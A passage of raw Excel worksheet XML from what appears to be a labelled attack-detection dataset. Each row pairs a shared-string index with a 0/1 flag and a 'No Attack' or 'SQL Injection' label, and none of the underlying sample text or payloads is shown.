    <row r="30961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30961" s="1" t="s">
        <v>28067</v>
      </c>
      <c r="B30961">
        <v>0</v>
      </c>
      <c r="C30961" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30962" s="1" t="s">
        <v>27945</v>
      </c>
      <c r="B30962">
        <v>0</v>
      </c>
      <c r="C30962" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30963" s="1" t="s">
        <v>36626</v>
      </c>
      <c r="B30963">
        <v>0</v>
      </c>
      <c r="C30963" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30964" s="1" t="s">
        <v>29288</v>
      </c>
      <c r="B30964">
        <v>0</v>
      </c>
      <c r="C30964" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30965" s="1" t="s">
        <v>36615</v>
      </c>
      <c r="B30965">
        <v>0</v>
      </c>
      <c r="C30965" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30966" s="1" t="s">
        <v>33709</v>
      </c>
      <c r="B30966">
        <v>0</v>
      </c>
      <c r="C30966" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30967" s="1" t="s">
        <v>36637</v>
      </c>
      <c r="B30967">
        <v>0</v>
      </c>
      <c r="C30967" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30968" s="1" t="s">
        <v>35381</v>
      </c>
      <c r="B30968">
        <v>0</v>
      </c>
      <c r="C30968" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30969" s="1" t="s">
        <v>21274</v>
      </c>
      <c r="B30969">
        <v>0</v>
      </c>
      <c r="C30969" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30970" s="1" t="s">
        <v>28539</v>
      </c>
      <c r="B30970">
        <v>0</v>
      </c>
      <c r="C30970" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30971" s="1" t="s">
        <v>32677</v>
      </c>
      <c r="B30971">
        <v>0</v>
      </c>
      <c r="C30971" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30972" s="1" t="s">
        <v>29158</v>
      </c>
      <c r="B30972">
        <v>0</v>
      </c>
      <c r="C30972" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30973" s="1" t="s">
        <v>21234</v>
      </c>
      <c r="B30973">
        <v>0</v>
      </c>
      <c r="C30973" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30974" s="1" t="s">
        <v>18554</v>
      </c>
      <c r="B30974">
        <v>1</v>
      </c>
      <c r="C30974" s="7" t="str">
        <f t="shared" si="483"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30975" s="1" t="s">
        <v>24681</v>
      </c>
      <c r="B30975">
        <v>1</v>
      </c>
      <c r="C30975" s="7" t="str">
        <f t="shared" si="483"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30976" s="1" t="s">
        <v>17257</v>
      </c>
      <c r="B30976">
        <v>1</v>
      </c>
      <c r="C30976" s="7" t="str">
        <f t="shared" si="483"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30977" s="1" t="s">
        <v>12385</v>
      </c>
      <c r="B30977">
        <v>1</v>
      </c>
      <c r="C30977" s="7" t="str">
        <f t="shared" si="483"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30978" s="1" t="s">
        <v>15606</v>
      </c>
      <c r="B30978">
        <v>1</v>
      </c>
      <c r="C30978" s="7" t="str">
        <f t="shared" si="483"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30979" s="1" t="s">
        <v>14254</v>
      </c>
      <c r="B30979">
        <v>1</v>
      </c>
      <c r="C30979" s="7" t="str">
        <f t="shared" ref="C30979:C31042" si="484">IF(B30979=0,"No Attack", IF(B30979=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30980" s="1" t="s">
        <v>13219</v>
      </c>
      <c r="B30980">
        <v>1</v>
      </c>
      <c r="C30980" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30981" s="1" t="s">
        <v>14036</v>
      </c>
      <c r="B30981">
        <v>1</v>
      </c>
      <c r="C30981" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30982" s="1" t="s">
        <v>25559</v>
      </c>
      <c r="B30982">
        <v>1</v>
      </c>
      <c r="C30982" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30983" s="1" t="s">
        <v>19559</v>
      </c>
      <c r="B30983">
        <v>1</v>
      </c>
      <c r="C30983" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30984" s="1" t="s">
        <v>15552</v>
      </c>
      <c r="B30984">
        <v>1</v>
      </c>
      <c r="C30984" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30985" s="1" t="s">
        <v>19561</v>
      </c>
      <c r="B30985">
        <v>1</v>
      </c>
      <c r="C30985" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30986" s="1" t="s">
        <v>15625</v>
      </c>
      <c r="B30986">
        <v>1</v>
      </c>
      <c r="C30986" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30987" s="1" t="s">
        <v>13891</v>
      </c>
      <c r="B30987">
        <v>1</v>
      </c>
      <c r="C30987" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30988" s="1" t="s">
        <v>18148</v>
      </c>
      <c r="B30988">
        <v>1</v>
      </c>
      <c r="C30988" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30989" s="1" t="s">
        <v>25598</v>
      </c>
      <c r="B30989">
        <v>1</v>
      </c>
      <c r="C30989" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30990" s="1" t="s">
        <v>13274</v>
      </c>
      <c r="B30990">
        <v>1</v>
      </c>
      <c r="C30990" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30991" s="1" t="s">
        <v>13762</v>
      </c>
      <c r="B30991">
        <v>1</v>
      </c>
      <c r="C30991" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30992" s="1" t="s">
        <v>26585</v>
      </c>
      <c r="B30992">
        <v>1</v>
      </c>
      <c r="C30992" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30993" s="1" t="s">
        <v>19252</v>
      </c>
      <c r="B30993">
        <v>1</v>
      </c>
      <c r="C30993" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30994" s="1" t="s">
        <v>14710</v>
      </c>
      <c r="B30994">
        <v>1</v>
      </c>
      <c r="C30994" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30995" s="1" t="s">
        <v>12849</v>
      </c>
      <c r="B30995">
        <v>1</v>
      </c>
      <c r="C30995" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30996" s="1" t="s">
        <v>14990</v>
      </c>
      <c r="B30996">
        <v>1</v>
      </c>
      <c r="C30996" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30997" s="1" t="s">
        <v>17430</v>
      </c>
      <c r="B30997">
        <v>1</v>
      </c>
      <c r="C30997" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30998" s="1" t="s">
        <v>26177</v>
      </c>
      <c r="B30998">
        <v>1</v>
      </c>
      <c r="C30998" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30999" s="1" t="s">
        <v>15125</v>
      </c>
      <c r="B30999">
        <v>1</v>
      </c>
      <c r="C30999" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31000" s="1" t="s">
        <v>12222</v>
      </c>
      <c r="B31000">
        <v>1</v>
      </c>
      <c r="C31000" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31001" s="1" t="s">
        <v>850</v>
      </c>
      <c r="B31001">
        <v>1</v>
      </c>
      <c r="C31001" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31002" s="1" t="s">
        <v>849</v>
      </c>
      <c r="B31002">
        <v>1</v>
      </c>
      <c r="C31002" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31003" s="1" t="s">
        <v>16155</v>
      </c>
      <c r="B31003">
        <v>1</v>
      </c>
      <c r="C31003" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31004" s="1" t="s">
        <v>16541</v>
      </c>
      <c r="B31004">
        <v>1</v>
      </c>
      <c r="C31004" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31005" s="1" t="s">
        <v>26319</v>
      </c>
      <c r="B31005">
        <v>1</v>
      </c>
      <c r="C31005" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31006" s="1" t="s">
        <v>16829</v>
      </c>
      <c r="B31006">
        <v>1</v>
      </c>
      <c r="C31006" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31007" s="1" t="s">
        <v>20004</v>
      </c>
      <c r="B31007">
        <v>1</v>
      </c>
      <c r="C31007" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31008" s="1" t="s">
        <v>19306</v>
      </c>
      <c r="B31008">
        <v>1</v>
      </c>
      <c r="C31008" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31009" s="1" t="s">
        <v>16258</v>
      </c>
      <c r="B31009">
        <v>1</v>
      </c>
      <c r="C31009" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31010" s="1" t="s">
        <v>26426</v>
      </c>
      <c r="B31010">
        <v>1</v>
      </c>
      <c r="C31010" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31011" s="1" t="s">
        <v>25584</v>
      </c>
      <c r="B31011">
        <v>1</v>
      </c>
      <c r="C31011" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31012" s="1" t="s">
        <v>19964</v>
      </c>
      <c r="B31012">
        <v>1</v>
      </c>
      <c r="C31012" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31013" s="1" t="s">
        <v>15550</v>
      </c>
      <c r="B31013">
        <v>1</v>
      </c>
      <c r="C31013" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31014" s="1" t="s">
        <v>17852</v>
      </c>
      <c r="B31014">
        <v>1</v>
      </c>
      <c r="C31014" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31015" s="1" t="s">
        <v>15513</v>
      </c>
      <c r="B31015">
        <v>1</v>
      </c>
      <c r="C31015" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31016" s="1" t="s">
        <v>12129</v>
      </c>
      <c r="B31016">
        <v>1</v>
      </c>
      <c r="C31016" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31017" s="1" t="s">
        <v>18243</v>
      </c>
      <c r="B31017">
        <v>1</v>
      </c>
      <c r="C31017" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31018" s="1" t="s">
        <v>9918</v>
      </c>
      <c r="B31018">
        <v>0</v>
      </c>
      <c r="C31018" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31019" s="1" t="s">
        <v>22461</v>
      </c>
      <c r="B31019">
        <v>0</v>
      </c>
      <c r="C31019" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31020" s="1" t="s">
        <v>24138</v>
      </c>
      <c r="B31020">
        <v>0</v>
      </c>
      <c r="C31020" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31021" s="1" t="s">
        <v>31813</v>
      </c>
      <c r="B31021">
        <v>0</v>
      </c>
      <c r="C31021" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31022" s="1" t="s">
        <v>27280</v>
      </c>
      <c r="B31022">
        <v>0</v>
      </c>
      <c r="C31022" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31023" s="1" t="s">
        <v>23690</v>
      </c>
      <c r="B31023">
        <v>0</v>
      </c>
      <c r="C31023" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31024" s="1" t="s">
        <v>36072</v>
      </c>
      <c r="B31024">
        <v>0</v>
      </c>
      <c r="C31024" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31025" s="1" t="s">
        <v>35587</v>
      </c>
      <c r="B31025">
        <v>0</v>
      </c>
      <c r="C31025" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31026" s="1" t="s">
        <v>20325</v>
      </c>
      <c r="B31026">
        <v>0</v>
      </c>
      <c r="C31026" s="7" t="str">
        <f t="shared" si="484"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31027" s="1" t="s">
        <v>14379</v>
      </c>
      <c r="B31027">
        <v>1</v>
      </c>
      <c r="C31027" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31028" s="1" t="s">
        <v>12315</v>
      </c>
      <c r="B31028">
        <v>1</v>
      </c>
      <c r="C31028" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31029" s="1" t="s">
        <v>19227</v>
      </c>
      <c r="B31029">
        <v>1</v>
      </c>
      <c r="C31029" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31030" s="1" t="s">
        <v>25552</v>
      </c>
      <c r="B31030">
        <v>1</v>
      </c>
      <c r="C31030" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31031" s="1" t="s">
        <v>24602</v>
      </c>
      <c r="B31031">
        <v>1</v>
      </c>
      <c r="C31031" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31032" s="1" t="s">
        <v>15449</v>
      </c>
      <c r="B31032">
        <v>1</v>
      </c>
      <c r="C31032" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31033" s="1" t="s">
        <v>25008</v>
      </c>
      <c r="B31033">
        <v>1</v>
      </c>
      <c r="C31033" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31034" s="1" t="s">
        <v>18310</v>
      </c>
      <c r="B31034">
        <v>1</v>
      </c>
      <c r="C31034" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31035" s="1" t="s">
        <v>25902</v>
      </c>
      <c r="B31035">
        <v>1</v>
      </c>
      <c r="C31035" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31036" s="1" t="s">
        <v>12658</v>
      </c>
      <c r="B31036">
        <v>1</v>
      </c>
      <c r="C31036" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31037" s="1" t="s">
        <v>15908</v>
      </c>
      <c r="B31037">
        <v>1</v>
      </c>
      <c r="C31037" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31038" s="1" t="s">
        <v>16017</v>
      </c>
      <c r="B31038">
        <v>1</v>
      </c>
      <c r="C31038" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31039" s="1" t="s">
        <v>14900</v>
      </c>
      <c r="B31039">
        <v>1</v>
      </c>
      <c r="C31039" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31040" s="1" t="s">
        <v>19531</v>
      </c>
      <c r="B31040">
        <v>1</v>
      </c>
      <c r="C31040" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31041" s="1" t="s">
        <v>12372</v>
      </c>
      <c r="B31041">
        <v>1</v>
      </c>
      <c r="C31041" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31042" s="1" t="s">
        <v>16507</v>
      </c>
      <c r="B31042">
        <v>1</v>
      </c>
      <c r="C31042" s="7" t="str">
        <f t="shared" si="484"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31043" s="1" t="s">
        <v>14578</v>
      </c>
      <c r="B31043">
        <v>1</v>
      </c>
      <c r="C31043" s="7" t="str">
        <f t="shared" ref="C31043:C31106" si="485">IF(B31043=0,"No Attack", IF(B31043=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31044" s="1" t="s">
        <v>19730</v>
      </c>
      <c r="B31044">
        <v>1</v>
      </c>
      <c r="C31044" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31045" s="1" t="s">
        <v>17527</v>
      </c>
      <c r="B31045">
        <v>1</v>
      </c>
      <c r="C31045" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31046" s="1" t="s">
        <v>12834</v>
      </c>
      <c r="B31046">
        <v>1</v>
      </c>
      <c r="C31046" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31047" s="1" t="s">
        <v>18760</v>
      </c>
      <c r="B31047">
        <v>1</v>
      </c>
      <c r="C31047" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31048" s="1" t="s">
        <v>15812</v>
      </c>
      <c r="B31048">
        <v>1</v>
      </c>
      <c r="C31048" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31049" s="1" t="s">
        <v>13281</v>
      </c>
      <c r="B31049">
        <v>1</v>
      </c>
      <c r="C31049" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31050" s="1" t="s">
        <v>6924</v>
      </c>
      <c r="B31050">
        <v>1</v>
      </c>
      <c r="C31050" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31051" s="1" t="s">
        <v>16847</v>
      </c>
      <c r="B31051">
        <v>1</v>
      </c>
      <c r="C31051" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31052" s="1" t="s">
        <v>25527</v>
      </c>
      <c r="B31052">
        <v>1</v>
      </c>
      <c r="C31052" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31053" s="1" t="s">
        <v>16620</v>
      </c>
      <c r="B31053">
        <v>1</v>
      </c>
      <c r="C31053" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31054" s="1" t="s">
        <v>12215</v>
      </c>
      <c r="B31054">
        <v>1</v>
      </c>
      <c r="C31054" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31055" s="1" t="s">
        <v>18654</v>
      </c>
      <c r="B31055">
        <v>1</v>
      </c>
      <c r="C31055" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31056" s="1" t="s">
        <v>24791</v>
      </c>
      <c r="B31056">
        <v>1</v>
      </c>
      <c r="C31056" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31057" s="1" t="s">
        <v>15360</v>
      </c>
      <c r="B31057">
        <v>1</v>
      </c>
      <c r="C31057" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31058" s="1" t="s">
        <v>6922</v>
      </c>
      <c r="B31058">
        <v>1</v>
      </c>
      <c r="C31058" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31059" s="1" t="s">
        <v>6923</v>
      </c>
      <c r="B31059">
        <v>1</v>
      </c>
      <c r="C31059" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31060" s="1" t="s">
        <v>13026</v>
      </c>
      <c r="B31060">
        <v>1</v>
      </c>
      <c r="C31060" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31061" s="1" t="s">
        <v>12295</v>
      </c>
      <c r="B31061">
        <v>1</v>
      </c>
      <c r="C31061" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31062" s="1" t="s">
        <v>15484</v>
      </c>
      <c r="B31062">
        <v>1</v>
      </c>
      <c r="C31062" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="31063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31063" s="1" t="s">
        <v>25247</v>
      </c>
      <c r="B31063">
        <v>1</v>
      </c>
      <c r="C31063" s="7" t="str">
        <f t="shared" si="485"/>
        <v>SQL Injection</v>
      </c>
    </row>
